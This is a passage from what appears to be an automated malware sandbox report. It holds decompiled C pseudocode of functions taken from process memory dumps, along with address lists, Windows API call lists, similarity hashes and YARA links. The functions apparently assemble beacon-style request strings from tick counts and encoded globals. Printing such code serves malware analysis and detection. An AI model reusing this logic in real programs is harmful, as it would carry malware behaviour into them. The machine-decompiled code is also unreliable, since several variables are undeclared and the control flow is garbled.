								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E010E2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E010E23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E010E2467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x010e2268
0x010e2269
0x010e226a
0x010e226d
0x010e226f
0x010e2272
0x010e2273
0x010e2275
0x010e2276
0x010e2277
0x010e227a
0x010e2284
0x010e2335
0x010e233c
0x010e2345
0x010e228a
0x010e228a
0x010e2290
0x010e2296
0x010e2299
0x010e229c
0x010e22a0
0x010e22a5
0x010e22aa
0x010e232a
0x00000000
0x010e22ac
0x010e22ac
0x010e22b8
0x010e22ba
0x010e2315
0x010e2315
0x010e231b
0x00000000
0x010e22bc
0x010e22cb
0x010e22cd
0x010e22ce
0x010e22cf
0x010e22d2
0x010e22d2
0x010e22d4
0x00000000
0x010e22d6
0x010e22d6
0x010e2320
0x010e22d8
0x010e22d8
0x010e22dc
0x010e22e4
0x010e22e9
0x010e22ee
0x010e22fa
0x010e2302
0x010e2309
0x010e230f
0x010e2313
0x00000000
0x010e2313
0x010e22d6
0x010e22d4
0x00000000
0x010e22ba
0x010e232e
0x010e232e
0x010e232e
0x010e22aa
0x010e234a
0x010e2351

Memory Dump Source

Source File: 00000000.00000002.478862379.00000000010E1000.00000020.00020000.sdmp, Offset: 010E0000, based on PE: true

Associated: 00000000.00000002.478825630.00000000010E0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478910384.00000000010E3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.478935442.00000000010E5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.478980030.00000000010E6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: ebbff33ab0c609116cf002f6860d41f3e762bd626dee66aa24c015cdbb3709fb
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: C821D6729002059FCB14DF79C8848ABBBE9FF48310B45C1A8D9969B245DB30FA15CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 011D7DE0, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E011D7DE0(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E011D7F4B(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E011D8005(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E011D7EF0(_t55, _t66);
										_t89 = _t66 + 0x10;
										E011D7F4B(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E011D7FE7(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x011d7de4
0x011d7de5
0x011d7de6
0x011d7de9
0x011d7deb
0x011d7dee
0x011d7def
0x011d7df1
0x011d7df2
0x011d7df3
0x011d7df6
0x011d7e00
0x011d7eb1
0x011d7eb8
0x011d7ec1
0x011d7e06
0x011d7e06
0x011d7e0c
0x011d7e12
0x011d7e15
0x011d7e18
0x011d7e1c
0x011d7e21
0x011d7e26
0x011d7ea6
0x00000000
0x011d7e28
0x011d7e28
0x011d7e34
0x011d7e36
0x011d7e91
0x011d7e91
0x011d7e97
0x00000000
0x011d7e38
0x011d7e47
0x011d7e49
0x011d7e4a
0x011d7e4b
0x011d7e4e
0x011d7e4e
0x011d7e50
0x00000000
0x011d7e52
0x011d7e52
0x011d7e9c
0x011d7e54
0x011d7e54
0x011d7e58
0x011d7e60
0x011d7e65
0x011d7e6a
0x011d7e76
0x011d7e7e
0x011d7e85
0x011d7e8b
0x011d7e8f
0x00000000
0x011d7e8f
0x011d7e52
0x011d7e50
0x00000000
0x011d7e36
0x011d7eaa
0x011d7eaa
0x011d7eaa
0x011d7e26
0x011d7ec6
0x011d7ecd

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction ID: 5b9c808d3a19e220cd833efd32e707e3f05f440dca7c176f1c3e14b82ef9996b
Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
Instruction Fuzzy Hash: 2121B3739002159FDB18EF68C8C09ABBBA5FF48354B0685A8DD59DB285D730F915CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 01154AAE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.479498286.0000000001154000.00000040.00020000.sdmp, Offset: 01154000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 614098ce9ca1fbb2e56aa9abb132c14e41142b54eda2ecf9a875c0798b337cec
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 6E1193733401009FD798DE59ECC0FA2B3DAEB982307298166ED18CB705E735E851C760

Uniqueness

Uniqueness Score: -1.00%

Function 01154EA7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.479498286.0000000001154000.00000040.00020000.sdmp, Offset: 01154000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 49edbc010f00ecdc91e37534c23148eb20cfbfdfa0dd0841ea306fedb02f6021
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: B601B977304150CFD75CCB1DD988D79BBE4EBC1220B1A807ECA5687A16E334E485D561

Uniqueness

Uniqueness Score: -1.00%

Function 011D46D1, Relevance: 21.3, APIs: 14, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E011D46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				void* _t138;
				intOrPtr _t139;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				intOrPtr* _t166;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x11da018; // 0x0
				asm("bswap eax");
				_t65 =  *0x11da014; // 0x0
				_t166 =  *0x11da134; // 0x11d7909
				asm("bswap eax");
				_t66 =  *0x11da010; // 0x0
				asm("bswap eax");
				_t67 =  *0x11da00c; // 0x0
				asm("bswap eax");
				_t68 =  *0x11da2d4; // 0x0
				_t3 = _t68 + 0x11db613; // 0x51082418
				_t157 =  *_t166(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x11da02c,  *0x11da004, _t63);
				_t72 =  *0x11da2d4; // 0x0
				_t4 = _t72 + 0x11db653; // 0x98a9fe19
				_t75 =  *_t166(_t157 + _t143, _t4, E011D6A09());
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x11da2d4; // 0x0
					_t8 = _t139 + 0x11db65e; // 0x35265981
					_t142 =  *_t166(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E011D5040(_t144);
				_t77 =  *0x11da2d4; // 0x0
				_t10 = _t77 + 0x11db302; // 0x4ad9ece2
				_t159 = _t158 +  *_t166(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x11da2d4; // 0x0
				_t12 = _t81 + 0x11db7aa; // 0x11db7aa
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x11db2d7; // 0xefd2fcd4
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 +  *_t166(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x11da31c; // 0x0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x11da2d4; // 0x0
					_t18 = _t135 + 0x11db8da; // 0x82681b86
					_t138 =  *_t166(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x11da32c; // 0x0
				if(_t86 != 0) {
					_t132 =  *0x11da2d4; // 0x0
					_t20 = _t132 + 0x11db676; // 0x26271f16
					 *_t166(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x11da37c; // 0x0
				_t88 = E011D2885(0x11da00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x11da290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x11da290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x11da290, _t167, _v12);
						goto L28;
					}
					E011D2DD0(GetTickCount());
					_t95 =  *0x11da37c; // 0x0
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x11da37c; // 0x0
					__imp__(_t99 + 0x40);
					_t101 =  *0x11da37c; // 0x0
					_t163 = E011D624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x11da290, _t167, _a8);
						goto L27;
					}
					 *0x11da10c(_t163, 0x11d92ac);
					_push(_t163);
					_t107 = E011D21C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x11da290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E011D4AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E011D1492();
						L24:
						HeapFree( *0x11da290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E011D26C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E011D161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E011D50CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E011D580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
						if(_a12 != 0) {
							L21:
							E011D50CA(_a4);
							if(_a20 == 0 || _a20 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_a20 = _a20 & 0x00000000;
						goto L18;
					}
				}
			}

0x011d46d1
0x011d46d1
0x011d46d1
0x011d46da
0x011d46df
0x011d46e6
0x011d46e8
0x011d46e8
0x011d46f5
0x011d4700
0x011d4703
0x011d4708
0x011d470e
0x011d4711
0x011d4716
0x011d4719
0x011d471e
0x011d4721
0x011d472d
0x011d473a
0x011d4742
0x011d4747
0x011d4752
0x011d4754
0x011d4757
0x011d475d
0x011d475f
0x011d4767
0x011d4772
0x011d4774
0x011d4777
0x011d4777
0x011d4779
0x011d4780
0x011d4785
0x011d4792
0x011d4794
0x011d4799
0x011d47a1
0x011d47a4
0x011d47aa
0x011d47b5
0x011d47b7
0x011d47bc
0x011d47c1
0x011d47c4
0x011d47c9
0x011d47d4
0x011d47d6
0x011d47d9
0x011d47d9
0x011d47db
0x011d47e2
0x011d47e5
0x011d47ea
0x011d47f4
0x011d47f6
0x011d47f6
0x011d47f9
0x011d4807
0x011d480c
0x011d4810
0x011d4813
0x011d49dd
0x011d49e5
0x011d49f2
0x011d4819
0x011d4825
0x011d482d
0x011d4830
0x011d49cd
0x011d49d7
0x00000000
0x011d49d7
0x011d483c
0x011d4841
0x011d484a
0x011d485b
0x011d485f
0x011d4868
0x011d486e
0x011d487b
0x011d4882
0x011d488b
0x011d4891
0x011d49bd
0x011d49c7
0x00000000
0x011d49c7
0x011d489d
0x011d48a3
0x011d48a4
0x011d48ab
0x011d48ae
0x011d49af
0x011d49b7
0x00000000
0x011d49b7
0x011d48b7
0x011d48bd
0x011d48c6
0x011d48cf
0x011d48da
0x011d48e1
0x011d48e4
0x011d49f5
0x011d4997
0x011d4997
0x011d499c
0x011d49a7
0x011d49ad
0x00000000
0x011d49ad
0x011d48ee
0x011d48f5
0x011d48f8
0x011d48fd
0x011d490d
0x011d4910
0x011d4916
0x011d491c
0x011d4922
0x011d4925
0x011d492b
0x011d492e
0x011d4933
0x011d4937
0x011d4937
0x011d4943
0x011d494f
0x011d4953
0x011d4955
0x011d495a
0x011d495c
0x011d4961
0x011d4966
0x011d4973
0x011d497b
0x011d497e
0x011d497e
0x011d495a
0x00000000
0x011d4945
0x011d4949
0x011d4980
0x011d4983
0x011d498c
0x00000000
0x00000000
0x00000000
0x00000000
0x011d498c
0x011d494b
0x00000000
0x011d494b
0x011d4943

APIs

GetTickCount.KERNEL32 ref: 011D46E8
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 011D4825
GetTickCount.KERNEL32 ref: 011D4836
RtlEnterCriticalSection.NTDLL(-00000040), ref: 011D484A
RtlLeaveCriticalSection.NTDLL(-00000040), ref: 011D4868

Part of subcall function 011D624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6278
Part of subcall function 011D624D: lstrlen.KERNEL32(00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6280
Part of subcall function 011D624D: strcpy.NTDLL ref: 011D6297
Part of subcall function 011D624D: lstrcat.KERNEL32(00000000,00000000), ref: 011D62A2

lstrcpy.KERNEL32(00000000,?), ref: 011D48BD
lstrcat.KERNEL32(00000000,?), ref: 011D48CF
lstrcat.KERNEL32(00000000,00000000), ref: 011D48D5

Part of subcall function 011D4AA6: lstrlen.KERNEL32(?,00000000,00000000,011D7909,011D13D0,?,011D55DE,011D55DE,?,011D55DE,?,00000000,E8FA7DD7,00000000), ref: 011D4AAD
Part of subcall function 011D4AA6: mbstowcs.NTDLL ref: 011D4AD6
Part of subcall function 011D4AA6: memset.NTDLL ref: 011D4AE8

wcstombs.NTDLL ref: 011D4966

Part of subcall function 011D161A: SysAllocString.OLEAUT32(00000000), ref: 011D165B

Part of subcall function 011D50CA: HeapFree.KERNEL32(00000000,00000000,011D4239,00000000,00000001,?,00000000,?,?,?,011D6B8D,00000000,?,00000001), ref: 011D50D6

HeapFree.KERNEL32(00000000,?,00000000), ref: 011D49A7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 011D49B7
HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 011D49C7

Part of subcall function 011D21C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,011D7100,00000000), ref: 011D21D1
Part of subcall function 011D21C1: lstrlen.KERNEL32(?), ref: 011D21D9
Part of subcall function 011D21C1: lstrcpy.KERNEL32(00000000,00000000), ref: 011D21ED
Part of subcall function 011D21C1: lstrcat.KERNEL32(00000000,?), ref: 011D21F8

HeapFree.KERNEL32(00000000,?), ref: 011D49D7
HeapFree.KERNEL32(00000000,?), ref: 011D49E5

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrlen$lstrcat$CountCriticalSectionTicklstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
String ID:
API String ID: 3886839532-0
Opcode ID: d9b0d575d9d8d30cddbd5590acc676ae9127f2249d48daf6ec7d700169832d54
Instruction ID: e63b1f61a0f9768d204a4722b927d7045ccb35dd0ce98b480cb914fff96ef63d
Opcode Fuzzy Hash: d9b0d575d9d8d30cddbd5590acc676ae9127f2249d48daf6ec7d700169832d54
Instruction Fuzzy Hash: 86A1BB71502219EFDB29DFA9EC88E9A3BB9FF08354F114021F919C7254DB35E990CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 011D6EFC, Relevance: 21.2, APIs: 14, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E011D6EFC(long __eax, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v60;
				intOrPtr _v76;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t39;
				void* _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				void* _t87;
				intOrPtr _t88;
				void* _t91;
				intOrPtr _t92;
				void* _t95;
				intOrPtr* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x11da290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x11da018; // 0x0
					asm("bswap eax");
					_t97 =  *0x11da134; // 0x11d7909
					_t32 =  *0x11da014; // 0x0
					asm("bswap eax");
					_t33 =  *0x11da010; // 0x0
					asm("bswap eax");
					_t34 =  *0x11da00c; // 0x0
					asm("bswap eax");
					_t35 =  *0x11da2d4; // 0x0
					_t2 = _t35 + 0x11db613; // 0x51082418
					_t111 =  *_t97(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x11da02c,  *0x11da004, _t110);
					_t39 =  *0x11da2d4; // 0x0
					_t3 = _t39 + 0x11db653; // 0x98a9fe19
					_t42 =  *_t97(_t111 + _t117, _t3, E011D6A09());
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_v4 != 0) {
						_t92 =  *0x11da2d4; // 0x0
						_t7 = _t92 + 0x11db65e; // 0x35265981
						_t95 =  *_t97(_t112 + _t117, _t7, _v4);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E011D5040(_t99);
					_t44 =  *0x11da2d4; // 0x0
					_t9 = _t44 + 0x11db302; // 0x4ad9ece2
					_t113 = _t112 +  *_t97(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x11da2d4; // 0x0
					_t11 = _t48 + 0x11db2d7; // 0xefd2fcd4
					_t114 = _t113 +  *_t97(_t113 + _t117, _t11, 0);
					_t52 =  *0x11da32c; // 0x0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x11da2d4; // 0x0
						_t13 = _t88 + 0x11db676; // 0x26271f16
						_t91 =  *_t97(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x11da37c; // 0x0
					_v4 = E011D2885(0x11da00a, _t105 + 4);
					_t55 =  *0x11da31c; // 0x0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x11da2d4; // 0x0
						_t16 = _t84 + 0x11db8da; // 0x82681b86
						_t87 =  *_t97(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x11da318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x11da2d4; // 0x0
						_t18 = _t81 + 0x11db8b1; // 0x2aad0059
						 *_t97(_t114 + _t117, _t18, _t56);
					}
					if(_v4 != _t107) {
						_t98 = RtlAllocateHeap( *0x11da290, _t107, 0x800);
						if(_t98 != _t107) {
							E011D2DD0(GetTickCount());
							_t62 =  *0x11da37c; // 0x0
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x11da37c; // 0x0
							__imp__(_t66 + 0x40);
							_t68 =  *0x11da37c; // 0x0
							_t115 = E011D624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								 *0x11da10c(_t115, 0x11d92ac);
								_push(_t115);
								_t108 = E011D21C1();
								_v40 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _v28);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E011D1032(0xffffffffffffffff, _t98, _v48, _v44);
									_v76 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E011D1492();
									}
									HeapFree( *0x11da290, 0, _v60);
								}
								HeapFree( *0x11da290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x11da290, _t107, _t98);
						}
						HeapFree( *0x11da290, _t107, _v12);
					}
					HeapFree( *0x11da290, _t107, _t117);
				}
				return _v16;
			}

0x011d6efc
0x011d6f10
0x011d6f12
0x011d6f20
0x011d6f24
0x011d6f2c
0x011d6f34
0x011d6f34
0x011d6f36
0x011d6f42
0x011d6f4a
0x011d6f51
0x011d6f56
0x011d6f59
0x011d6f5e
0x011d6f61
0x011d6f66
0x011d6f69
0x011d6f75
0x011d6f82
0x011d6f8a
0x011d6f8f
0x011d6f9a
0x011d6f9c
0x011d6f9f
0x011d6fa5
0x011d6fa7
0x011d6fb0
0x011d6fbb
0x011d6fbd
0x011d6fc0
0x011d6fc0
0x011d6fc2
0x011d6fc9
0x011d6fce
0x011d6fdb
0x011d6fdd
0x011d6fe2
0x011d6ff0
0x011d6ff2
0x011d6ff7
0x011d6ffc
0x011d6fff
0x011d7004
0x011d700f
0x011d7011
0x011d7014
0x011d7014
0x011d7016
0x011d7029
0x011d702d
0x011d7032
0x011d7036
0x011d7039
0x011d703e
0x011d7049
0x011d704b
0x011d704e
0x011d704e
0x011d7050
0x011d7057
0x011d705a
0x011d705f
0x011d7069
0x011d706b
0x011d7072
0x011d708a
0x011d708e
0x011d709a
0x011d709f
0x011d70a8
0x011d70b9
0x011d70bd
0x011d70c6
0x011d70cc
0x011d70d9
0x011d70e6
0x011d70ec
0x011d70f4
0x011d70fa
0x011d7100
0x011d7104
0x011d7108
0x011d710e
0x011d7112
0x011d7119
0x011d7120
0x011d7124
0x011d712f
0x011d7136
0x011d713a
0x011d7143
0x011d7143
0x011d7154
0x011d7154
0x011d7163
0x011d7169
0x011d7169
0x011d7173
0x011d7173
0x011d7184
0x011d7184
0x011d7192
0x011d7192
0x011d71a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 011D6F1A
GetTickCount.KERNEL32 ref: 011D6F2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 011D7084
GetTickCount.KERNEL32 ref: 011D7094
RtlEnterCriticalSection.NTDLL(-00000040), ref: 011D70A8
RtlLeaveCriticalSection.NTDLL(-00000040), ref: 011D70C6

Part of subcall function 011D624D: lstrlen.KERNEL32(00000000,00000000,63DCC828,00000000,00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6278
Part of subcall function 011D624D: lstrlen.KERNEL32(00000000,?,00000000,011D70D9,00000000,00000000), ref: 011D6280
Part of subcall function 011D624D: strcpy.NTDLL ref: 011D6297
Part of subcall function 011D624D: lstrcat.KERNEL32(00000000,00000000), ref: 011D62A2

HeapFree.KERNEL32(00000000,00000000,00000000,00000000), ref: 011D7173

Part of subcall function 011D21C1: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,011D7100,00000000), ref: 011D21D1
Part of subcall function 011D21C1: lstrlen.KERNEL32(?), ref: 011D21D9
Part of subcall function 011D21C1: lstrcpy.KERNEL32(00000000,00000000), ref: 011D21ED
Part of subcall function 011D21C1: lstrcat.KERNEL32(00000000,?), ref: 011D21F8

lstrcpy.KERNEL32(00000000,?), ref: 011D7112
lstrcat.KERNEL32(00000000,00000000), ref: 011D7120
lstrcat.KERNEL32(00000000,00000000), ref: 011D7124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 011D7154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 011D7163
HeapFree.KERNEL32(00000000,?), ref: 011D7184
HeapFree.KERNEL32(00000000,00000000), ref: 011D7192

Memory Dump Source

Source File: 00000000.00000002.479684101.00000000011D1000.00000020.00000001.sdmp, Offset: 011D0000, based on PE: true

Associated: 00000000.00000002.479673787.00000000011D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479715506.00000000011D9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.479745898.00000000011DA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.479794058.00000000011DC000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTicklstrcpy$EnterLeavestrcpy
String ID:
API String ID: 424325591-0
Opcode ID: 0308661200250213b2e85d71fe956e8d2386b3b2fab5cbeb1c8077eb388aa69b
